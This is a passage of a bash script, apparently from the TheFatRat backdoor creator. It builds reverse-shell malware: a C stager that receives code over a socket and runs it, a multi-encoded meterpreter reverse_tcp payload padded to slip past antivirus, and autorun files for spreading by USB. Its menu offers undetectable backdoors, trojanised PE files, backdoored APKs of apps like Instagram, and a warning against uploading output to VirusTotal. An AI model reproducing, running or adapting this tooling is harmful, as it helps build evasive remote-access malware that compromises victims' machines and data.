      echo '    if (buffer == NULL)'>>$stag
      echo '        punt(my_socket, "could not allocate buffer\n");'>>$stag
      echo '    buffer[0] = 0xBF;'>>$stag
      echo '    memcpy(buffer + 1, &my_socket, 4);'>>$stag
      echo '    count = recv_all(my_socket, buffer + 5, size);'>>$stag
      echo '    function = (void (*)())buffer;'>>$stag
      echo '    function();'>>$stag
      echo '    return 0;'>>$stag
      echo '}' >> $stag
      $COMPILER $stag -o output/$fira.exe -lws2_32 
      echo
      echo -e $yellow " [+]"$okegreen"Compiling Binary Done  ";tput sgr0
      rm $stag
      echo -ne $yellow " Press Enter key to Contiune ..."
      read aw
      PwnWinds

      elif test $fatrat1 == '8'
						then
		 				clear
						menu

	 	else
			echo -e "  Incorrect Number"
			fi
			echo ""
			echo -n -e $yellow " Do you want exit? ( Yes / No ) : "
		read back
			if [ $back != 'n' ] && [ $back != 'N' ]
					then

					clear
					exit
			elif [ $back != 'y' ] && [ $back != 'Y' ]
					then
					PwnWinds
			fi
}


########################################### MENU AVOID ############################################################
#
#recoded AVOID ( AV0id - Metapsloit Payload Anti-Virus Evasion ) to next version - Screetsec ( Edo -maland )
#Released as open source by NCC Group Plc - http://www.nccgroup.com/
#Developed or original code by Daniel Compton, daniel dot compton at nccgroup dot com
#Removed Deprecated Commands in favor of MsfVenom by Jason Soto www.jsitech.com
#Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k , Screetsec
#
################################################################################################################
function avoid {
clear

# User options
PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use
MSFVENOM="$msfvenom" # Path to the msfvenom script
MSFCONSOLE="$msfconsole" # Path to the msfconsole script

#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 36 73 > /dev/null
clear
SERVICE=service;

#Checking Version
VERSION="2.1"


# spinner for Metasploit Generator
spinlong ()
{
    bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}


# spinner for random seed generator
spinlong2 ()
{
    bar=" 01100111001001001110111001101010101010110101001010111001010101010101010"
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}
clear

#MENU INTI
echo ""
echo -e $cyan"========================================================================"
echo -e $okegreen"          METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION  "
echo -e $cyan"========================================================================"
echo -e $red""
echo "	 									"
echo "   	                  ..:::::::::..		"
echo "   	               ..:::aad8888888baa:::..	"
echo "   	           .::::d:?88888888888?::8b::::.	"
echo "   	         .:::d8888:?88888888??a888888b:::.	"
echo "   	       .:::d8888888a8888888aa8888888888b:::.	"
echo "   	      ::::dP::::::::88888888888::::::::Yb::::	"
echo "   	     ::::dP:::::::::Y888888888P:::::::::Yb::::	"
echo "   	    ::::d8:::::::::::Y8888888P:::::::::::8b::::	"
echo "   	   .::::88::::::::::::Y88888P::::::::::::88::::.	"
echo "   	   :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::	"
echo "   	   :::::::Y88888888888P::|::Y88888888888P:::::::	"
echo "   	   ::::::::::::::::888:::|:::888::::::::::::::::	"
echo "   	    :::::::::::::::8888888888888b::::::::::::::	"
echo "   	    :::::::::::::::88888888888888::::::::::::::	"
echo "   	     :::::::::::::d88888888888888::::::::::::: 	"
echo "   	      ::::::::::::88::88::88:::88::::::::::::	"
echo "   	        ::::::::::88::88::88:::88::::::::::	"
echo "   	          ::::::::88::88::P::::88::::::::	"
echo "   	            ::::::88::88:::::::88::::::	"
echo "   	                :::::::::::::::::::	"
echo "   	                     ::::::::: 	"
echo ""
echo -e -$cyan	"                REMAKE:$red "Screetsec" $cyan( Edo -maland- ) "
echo -e "      OPEN SOURCE : $red "NCC Group Plc" $cyan( http://www.nccgroup.com ) "
echo -e "  DEVELOPED : $red Daniel Compton, daniel dot compton at nccgroup dot com "
echo -e $cyan"========================================================================"
echo -e $okegreen"          METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION  "
echo -e $cyan"========================================================================"
echo -e $cyan""
# Set Output filename
echo
echo -n -e "TYPE THE DESIRED OUTPUT FILENAME : $okegreen" ;
read OUTPUTNAME
echo ""
echo ""
echo -n -e $cyan"TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : $okegreen" ;
read LABEL
echo ""

#Check for Metasploit
if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then
    echo ""
else
    echo ""
    echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
    echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options"
    echo ""
    exit 1
fi

# Random Msfencode encoding iterations
#ITER=`seq 5 10 |sort -R |sort -R | head -1`
ITER=`shuf -i 10-20 -n 1`
echo -ne  $cyan"TYPE YOUR LHOST : $okegreen" ;
read IP
echo ""
echo ""
echo -ne $cyan"TYPE YOUR LPORT : $okegreen" ;
    read PORT
    echo ""
    echo ""
echo ""
echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..."
echo ""
echo ""
spinlong
#Payload creater
$MSFVENOM -p "$PAYLOAD" LHOST="$IP" LPORT="$PORT" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null |  $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null
echo ""
echo ""


# ANOTHER MENU
clear
echo "						"
echo -e $cyan"=================================================================="
echo -e $okegreen"   __            _                                    _  __  "
echo "  / _|_   _  ___| | ___   _  ___  _   _ _ __ ___  ___| |/ _| "
echo " | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_  "
echo " |  _| |_| | (__|   <| |_| | (_) | |_| | |  \__ \  __/ |  _| "
echo " |_|  \____|\___|_|\_\\___ |\___/ \____|_|  |___/\___|_|_|   "
echo "                      |___/                                 "
echo -e $cyan"=================================================================="
echo -e $red""
echo -e $okegreen"            ||||||||||||||	"
echo -e $red"           =              \       "
echo "           =               |	"
echo "          _=            ___/	"
echo -e "         / _\           ($okegreen"o"$red)\	"
echo "        | | \            _  \	"
echo "        | |/            (____)	"
echo "         \__/          /   |	"
echo "          /           /  ___)	"
echo -e "         /    \       \    _)                       $okegreen ) "
echo -e $red"        \      \           /       $okegreen  TheFatRat $okegreen     ( "
echo -e $red"      \/ \      \_________/   |\___________________ $okegreen ) "
echo -e $red"       \/ \      /            |     $okegreen"===="$red _______)__) "
echo -e "        \/ \    /           __/___  $okegreen"===="$red _/  "
echo -e "         \/ \  /           ($okegreen"O"$red ____)\\_(_/ "
echo -e "                          ($okegreen"O"$red _ ____) "
echo -e "                           ($okegreen"O"$red ____) "
echo ""
echo -e $cyan"================================================================= "
echo ""
echo -e $okegreen""
echo " 1. Normal [ 400K payload ]  - [ fast compile ]  "
echo ""
echo " 2. Stealth [ 1-2 MB payload ] - [ fast compile ] "
echo ""
echo " 3. Super Stealth - [ 10-20MB payload ] "
echo ""
echo " 4. Insane Stealth - [ 50MB payload ] "
echo ""
echo " 5. Desperate Stealth - [ 100MB payload ] "
echo ""
echo -ne $cyan "TYPE THE NUMBER IF YOU WANT :  " ;
read LEVEL
echo ""
if [ "$LEVEL" = "1" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 100000-500000 -n 1)
elif [ "$LEVEL" = "2" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 1000000-5000000 -n 1)
elif [ "$LEVEL" = "3" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 8000000-12000000 -n 1)
elif [ "$LEVEL" = "4" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 40000000-60000000 -n 1)
elif [ "$LEVEL" = "5" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 100000000-200000000 -n 1)
else
    echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting"
    echo ""
    exit 1
fi

# build the c file ready for compile
echo ""
echo '#include <stdio.h>' >> build.c
echo 'unsigned char padding[]=' >> build.c
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random
sed -i 's/$/"/' random
sed -i 's/^/"/' random
cat random >> build.c
echo  ';' >> build.c
echo 'char payload[] =' >> build.c
cat msf.c |grep -v "unsigned" >> build.c
echo 'char comment[512] = "";' >> build.c
echo 'int main(int argc, char **argv) {' >> build.c
echo  '	(*(void (*)()) payload)();' >> build.c
echo '	return(0);' >> build.c
echo '}' >> build.c

# gcc compile the exploit

ls icons/icon.res >/dev/null 2>&1
if [ $? -eq 0 ]; then
    $COMPILER -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME"
else
    $COMPILER -Wall -mwindows build.c -o "$OUTPUTNAME"
fi

# check if file built correctly
LOCATED=`pwd`
ls "$OUTPUTNAME" >/dev/null 2>&1
if [ $? -eq 0 ]; then
    echo ""
    echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m"
else
    echo ""
    echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting"
    echo ""
    exit 1
fi

# create autorun files
mkdir autorun >/dev/null 2>&1
cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1
cp icons/autorun.ico autorun/ >/dev/null 2>&1
echo "[autorun]" > autorun/autorun.inf
echo "open="$OUTPUTNAME"" >> autorun/autorun.inf
echo "icon=autorun.ico" >> autorun/autorun.inf
echo "label="$LABEL"" >> autorun/autorun.inf
echo ""
echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB"

# clean up temp files
rm build.c >/dev/null 2>&1
rm random >/dev/null 2>&1
rm msf.c >/dev/null 2>&1
rm msfhandler.rc >/dev/null 2>&1
			echo -n -e $okegreen"Do you want exit? ( Yes / No ) : "
		read back
			if [ $back != 'n' ] && [ $back != 'N' ]
					then
					clear
					exit
			elif [ $back != 'y' ] && [ $back != 'Y' ]
					then
					menu
			fi

}


#### credits
function credits {
clear
echo -e "
\033[31m##########################################################################\033[m
		             Credits To
\033[31m##########################################################################\033[m"
echo
echo -e $white "Special thanks to:"
echo
echo -e $red "Dracos Linux ( www.dracos-linux.org )"
echo
echo -e $red "Offensive Security for the awesome OS"
echo
echo -e $green "http://www.offensive-security.com/"
echo
echo -e $yellow "http://www.kali.org/"
echo
echo -e $cyan "http://www.kitploit.com/"
echo
echo -e $white "http://www.linuxsec.org/"
echo
echo -e $red "Big Thanks to : http://www.github.com/"
echo


}

###################################################################
# MENU FATRAT
###################################################################
menu () {
  clear
  resize -s 46 76 > /dev/null
  echo -e $okegreen""
  echo -e $okegreen"         ____							"
  echo -e $okegreen"        |    | 							"
  echo -e $okegreen"        |____| 							"
  echo -e $okegreen"       _|____|_      $okegreen _____ _       _____     _   _____     _       "
  echo -e $okegreen"        /  $white"ee"\_      $okegreen|_   _| |_ ___|   __|___| |_| __  |___| |_     "
  echo -e $okegreen"      .<     __O     $okegreen  | | |   | -_|   __| .'|  _|    -| .'|  _|	"
  echo -e $okegreen"     /\ \.-.' \      $okegreen  |_| |_|_|___|__|  |___|_| |__|__|___|_|  	"
  echo -e $okegreen"    J  \.|'.\/ \                  				"
  echo -e $okegreen"    | |_.|. | | |   $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] 	"
  echo -e $okegreen"     \__.' .|-' /   $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white]	"
  echo -e $okegreen"     L   /|o'--'\   $white"[$okegreen--$white] $cyan"           Version: $red"$Versi"           $white[$okegreen--$white]	"
  echo -e $okegreen"     |  /\/\/\   \  $white"[$okegreen--$white] $cyan"         Codename: $red"$codename"           $white[$okegreen--$white]    "
  echo -e $okegreen"     J /      \.__\ $white"[$okegreen--$white] $cyan"  Follow me on Github: $red@Screetsec   $white[$okegreen--$white]	"
  echo -e $okegreen"     J /      \.__\ $white"[$okegreen--$white] $cyan"  Dracos Linux : $red@dracos-linux.org  $white[$okegreen--$white]	"
  echo -e $okegreen"     |/         /   $white"[$okegreen--$white] $cyan"   				     $white[$okegreen--$white]		"
  echo -e $okegreen"       \      .'\.  $white"[$okegreen--$white]$white "    SELECT AN OPTION TO BEGIN:      $white[$okegreen--$white]  "
  echo -e $okegreen"    ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white]	"
  echo -e $okegreen"   (___._/  \_.___)'$white\_.-----------------------------------------/	"
  echo


  		echo -e $white " "
  		echo -e $white"	[$okegreen"01"$white]$okegreen  Create Backdoor with msfvenom"
  		echo -e $white"	[$okegreen"02"$white]$okegreen  Create Fud 100% Backdoor [Slow but Powerfull] "
  		echo -e $white"	[$okegreen"03"$white]$okegreen  Create Fud Backdoor with Avoid v1.2  "
  		echo -e $white"	[$okegreen"04"$white]$okegreen  Create Fud Backdoor with backdoor-factory [embed] "
  		echo -e $white"	[$okegreen"05"$white]$okegreen  Backdooring Original apk [Instagram, Line,etc] "
  		echo -e $white"	[$okegreen"06"$white]$okegreen  Create Fud Backdoor 1000% with PwnWinds [Excelent] "
  		echo -e $white"	[$okegreen"07"$white]$okegreen  Create auto listeners  "
  		echo -e $white"	[$okegreen"08"$white]$okegreen  Jump to msfconsole  "
  		echo -e $white"	[$okegreen"09"$white]$okegreen  Searchsploit  "
      echo -e $white"	[$okegreen"10"$white]$okegreen  File Pumper [Increase Your Files Size] "
  		echo -e $white"	[$okegreen"11"$white]$okegreen  Cleanup  "
  		echo -e $white"	[$okegreen"12"$white]$okegreen  Help  "
  		echo -e $white"	[$okegreen"13"$white]$okegreen  Credits  "
  		echo -e $white"	[$okegreen"14"$white]$okegreen  Exit  "
  		echo -e " "
  		echo -n -e $red'  \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice
  		read fatrat

  		if test $fatrat == '1'
  			then
  			cmsfvenom

  		elif test $fatrat == '2'
   			then
   			chmod +x powerfull.sh
  			xterm -fa monaco -fs 13 -bg black ./powerfull.sh 

  		elif test $fatrat == '3'
  			then
  			avoid

  		elif test $fatrat == '4'
  			then
  				echo ""
  				spinlong
  				echo ""
  				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira; read -p '  Located PE file for embed (example:/TheFatRat/PE/putty.exe) : ' embed
  				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1
  				spinlong
  				echo ""
  				echo ""
  				gboor
  				spinlong2
  				echo ""
  				echo -e $okegreen""
  				$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe 
                                  echo -e "Shell Saved To /backdoored/output/  press any key to continue"
  				read bebeku
  				clear
  				menu

  		elif test $fatrat == '5'
  			then
  			embedapk

      elif test $fatrat == '6'
        then
        PwnWinds

  		elif test $fatrat == '7'
  			then
  			clisteners

  		elif test $fatrat == '8'
   			then
   			xterm -fa monaco -fs 13 -bg black -e "$msfconsole" 

  		elif test $fatrat == '9'
   			then
  			clear
   			echo -e "\033[31mWhat do you want to Hack Today?\033[m"
  			echo -e "\033[31mEnter a search term and hit Enter\033[m"
  			read searchterm
  			gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
  			menu

      elif test $fatrat == '10'
        then
        echo
        echo -ne $okegreen " Located file (example:/output/backdoor.apk) :" ;tput sgr0
        read tampfile
        echo
        echo -ne $okegreen"  Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0
        read size
        echo
        echo -ne $okegreen"  mb or kb : " ;tput sgr0
        read type
        python $pump $tampfile $size -$type > /dev/null 2>&1
        echo
        echo -ne $yellow"  Finished Pumping ... "
        read oke
        menu

  		elif test $fatrat == '11'
  			then
  			echo ""
  			echo -ne $red"  [>] $cyan Are you sure you want to clean payload folders? [y/N] : "
  			read clean
  			if [ $clean == "y" ] ;
  				then
  			echo ""
  				else
  			clear
  			exit
  				fi
  			echo -e $red"  [*] $cyan Cleaning /TheFatRat/temp/"
  			cd temp
  			rm *.rc >/dev/null 2>&1
  			cd ..
  			sleep 2
  			echo ""
  			echo -e $red"  [*] $cyan Cleaning /TheFatRat/autorun/"
  			cd autorun
  			rm * >/dev/null 2>&1
  			cd ..
  			sleep 2
  			echo ""
  			echo -e $red"  [*] $cyan Cleaning /TheFatRat/output/"
  			cd output
  			rm * >/dev/null 2>&1
  			cd ..
  			sleep 2
  			echo ""
  			echo -e $red"  [*] $cyan Cleaning /TheFatRat/*.exe or apk"
  			rm *.exe *.apk  >/dev/null 2>&1
  			sleep 2
  			echo ""
  			echo -e $red"  [*] $cyan Cleaning /TheFatRat/backdoored/output/"
  			cd backdoored/output
  			rm * >/dev/null 2>&1
  			cd ..
  			cd ..
  			echo ""
  			echo -ne $red"  [*] $cyan Folders cleaned, press any key to return to the main menu."
  			read anjeng
  			menu

  		elif test $fatrat == '12'
   			then
   			firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md

   		elif test $fatrat == '13'
   			then
  			credits

      elif test $fatrat == '14'
        then
          Stop
          echo ""
          echo -e $okegreen"  REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!"
          echo ""
          read -p "  Press [Enter] key to Exit..."
          sleep 2
          clear
          exit
   		else
  			echo -e "  Incorrect Number"
  			fi
  			echo -n -e "  Do you want exit? ( Yes / No ) :"
  			read back
  			if [ $back != 'n' ] && [ $back != 'N' ]
  					then
  					clear
  					exit
  			elif [ $back != 'y' ] && [ $back != 'Y' ]
  					then
  					menu

fi
}
###################################################################
# MENU FATRAT
###################################################################
resize -s 46 76 > /dev/null
clear
echo -e $okegreen""
echo -e $okegreen"         ____							"
echo -e $okegreen"        |    | 							"
echo -e $okegreen"        |____| 							"
echo -e $okegreen"       _|____|_      $okegreen _____ _       _____     _   _____     _       "
echo -e $okegreen"        /  $white"ee"\_      $okegreen|_   _| |_ ___|   __|___| |_| __  |___| |_     "
echo -e $okegreen"      .<     __O     $okegreen  | | |   | -_|   __| .'|  _|    -| .'|  _|	"
echo -e $okegreen"     /\ \.-.' \      $okegreen  |_| |_|_|___|__|  |___|_| |__|__|___|_|  	"
echo -e $okegreen"    J  \.|'.\/ \                  				"
echo -e $okegreen"    | |_.|. | | |   $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] 	"
echo -e $okegreen"     \__.' .|-' /   $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white]	"
echo -e $okegreen"     L   /|o'--'\   $white"[$okegreen--$white] $cyan"           Version: $red"$Versi"           $white[$okegreen--$white]	"
echo -e $okegreen"     |  /\/\/\   \  $white"[$okegreen--$white] $cyan"         Codename: $red"$codename"           $white[$okegreen--$white]    "
echo -e $okegreen"     J /      \.__\ $white"[$okegreen--$white] $cyan"  Follow me on Github: $red@Screetsec   $white[$okegreen--$white]	"
echo -e $okegreen"     J /      \.__\ $white"[$okegreen--$white] $cyan"  Dracos Linux : $red@dracos-linux.org  $white[$okegreen--$white]	"
echo -e $okegreen"     |/         /   $white"[$okegreen--$white] $cyan"   				     $white[$okegreen--$white]		"
echo -e $okegreen"       \      .'\.  $white"[$okegreen--$white]$white "    SELECT AN OPTION TO BEGIN:      $white[$okegreen--$white]  "
echo -e $okegreen"    ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white]	"
echo -e $okegreen"   (___._/  \_.___)'$white\_.-----------------------------------------/	"
echo


		echo -e $white " "
		echo -e $white"	[$okegreen"01"$white]$okegreen  Create Backdoor with msfvenom"
		echo -e $white"	[$okegreen"02"$white]$okegreen  Create Fud 100% Backdoor [Slow but Powerfull] "
		echo -e $white"	[$okegreen"03"$white]$okegreen  Create Fud Backdoor with Avoid v1.2  "
		echo -e $white"	[$okegreen"04"$white]$okegreen  Create Fud Backdoor with backdoor-factory [embed] "
		echo -e $white"	[$okegreen"05"$white]$okegreen  Backdooring Original apk [Instagram, Line,etc] "
		echo -e $white"	[$okegreen"06"$white]$okegreen  Create Fud Backdoor 1000% with PwnWinds [Excelent] "
		echo -e $white"	[$okegreen"07"$white]$okegreen  Create auto listeners  "
		echo -e $white"	[$okegreen"08"$white]$okegreen  Jump to msfconsole  "
		echo -e $white"	[$okegreen"09"$white]$okegreen  Searchsploit  "
    echo -e $white"	[$okegreen"10"$white]$okegreen  File Pumper [Increase Your Files Size] "
		echo -e $white"	[$okegreen"11"$white]$okegreen  Cleanup  "
		echo -e $white"	[$okegreen"12"$white]$okegreen  Help  "
		echo -e $white"	[$okegreen"13"$white]$okegreen  Credits  "
		echo -e $white"	[$okegreen"14"$white]$okegreen  Exit  "
		echo -e " "
		echo -n -e $red'  \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice
		read fatrat

		if test $fatrat == '1'
			then
			cmsfvenom

		elif test $fatrat == '2'
 			then
 			chmod +x powerfull.sh
			xterm -fa monaco -fs 13 -bg black ./powerfull.sh 

		elif test $fatrat == '3'
			then
			avoid

		elif test $fatrat == '4'
			then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira; read -p '  Located PE file for embed (example:/TheFatRat/PE/putty.exe) : ' embed
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo -e $okegreen""
				$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe 
                                echo -e "Shell Saved To /backdoored/output/  press any key to continue"
				read bebeku
				clear
				menu

		elif test $fatrat == '5'
			then
			embedapk

    elif test $fatrat == '6'
      then
      PwnWinds

		elif test $fatrat == '7'
			then
			clisteners

		elif test $fatrat == '8'
 			then
 			xterm -fa monaco -fs 13 -bg black -e "$msfconsole" 

		elif test $fatrat == '9'
 			then
			clear
 			echo -e "\033[31mWhat do you want to Hack Today?\033[m"
			echo -e "\033[31mEnter a search term and hit Enter\033[m"
			read searchterm
			gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
			menu

    elif test $fatrat == '10'
      then
      echo
      echo -ne $okegreen " Located file (example:/output/backdoor.apk) :" ;tput sgr0
      read tampfile
      echo
      echo -ne $okegreen"  Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0
      read size
      echo
      echo -ne $okegreen"  mb or kb : " ;tput sgr0
      read type
      python $pump $tampfile $size -$type > /dev/null 2>&1
      echo
      echo -ne $yellow"  Finished Pumping ... "
      read oke
      menu

		elif test $fatrat == '11'
			then
			echo ""
			echo -ne $red"  [>] $cyan Are you sure you want to clean payload folders? [y/N] : "
			read clean
			if [ $clean == "y" ] ;
				then
			echo ""
				else
			clear
			exit
				fi
			echo -e $red"  [*] $cyan Cleaning /TheFatRat/temp/"
			cd temp
			rm *.rc >/dev/null 2>&1
			cd ..
			sleep 2
			echo ""
			echo -e $red"  [*] $cyan Cleaning /TheFatRat/autorun/"
			cd autorun
			rm * >/dev/null 2>&1
			cd ..
			sleep 2
			echo ""
			echo -e $red"  [*] $cyan Cleaning /TheFatRat/output/"
			cd output
			rm * >/dev/null 2>&1
			cd ..
			sleep 2
			echo ""
			echo -e $red"  [*] $cyan Cleaning /TheFatRat/*.exe or apk"
			rm *.exe *.apk  >/dev/null 2>&1
			sleep 2
			echo ""
			echo -e $red"  [*] $cyan Cleaning /TheFatRat/backdoored/output/"
			cd backdoored/output
			rm * >/dev/null 2>&1
			cd ..
			cd ..
			echo ""
			echo -ne $red"  [*] $cyan Folders cleaned, press any key to return to the main menu."
			read anjeng
			menu

		elif test $fatrat == '12'
 			then
 			firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md

 		elif test $fatrat == '13'
 			then
			credits

    elif test $fatrat == '14'
      then
        Stop
        echo ""
        echo -e $okegreen"  REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!"
        echo ""
        read -p "  Press [Enter] key to Exit..."
        sleep 2
        clear
        exit

 		else
			echo -e "  Incorrect Number"
			fi
			echo -n -e "  Do you want exit? ( Yes / No ) :"
			read back
			if [ $back != 'n' ] && [ $back != 'N' ]
					then
					clear
					exit
			elif [ $back != 'y' ] && [ $back != 'Y' ]
					then
					menu
fi